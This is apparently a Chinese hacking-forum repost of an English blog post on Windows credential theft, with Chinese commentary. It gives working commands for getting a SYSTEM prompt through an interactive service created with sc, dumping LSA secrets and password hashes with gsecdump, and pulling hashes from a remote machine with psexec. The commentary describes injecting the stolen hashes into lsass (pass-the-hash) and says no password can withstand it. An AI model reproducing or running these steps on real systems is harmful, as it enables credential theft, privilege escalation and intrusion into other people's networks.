HASH注入式攻击

本文装载于:http://forum.eviloctal.com/thread-34966-1-2.html

 

To get a DOS Prompt as NT system:

C:>sc create shellcmdline binpath= “C:WINDOWSsystem32cmd.exe /K start” type= own type= interact
[SC] CreateService SUCCESS

C:>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:>sc delete shellcmdline
[SC] DeleteService SUCCESS

————

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
NT AUTHORITYSYSTEM

C:WINDOWSsystem32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ –help ] show help
-a [ –dump_all ] dump all secrets
-l [ –dump_lsa ] dump lsa secrets
-w [ –dump_wireless ] dump microsoft wireless connections
-u [ –dump_usedhashes ] dump hashes from active logon sessions
-s [ –dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 – Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals – www.sysinternals.com

C:>psexec \COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:http://truesecurity.se/blogs/mur … -text-password.aspx

评论关闭。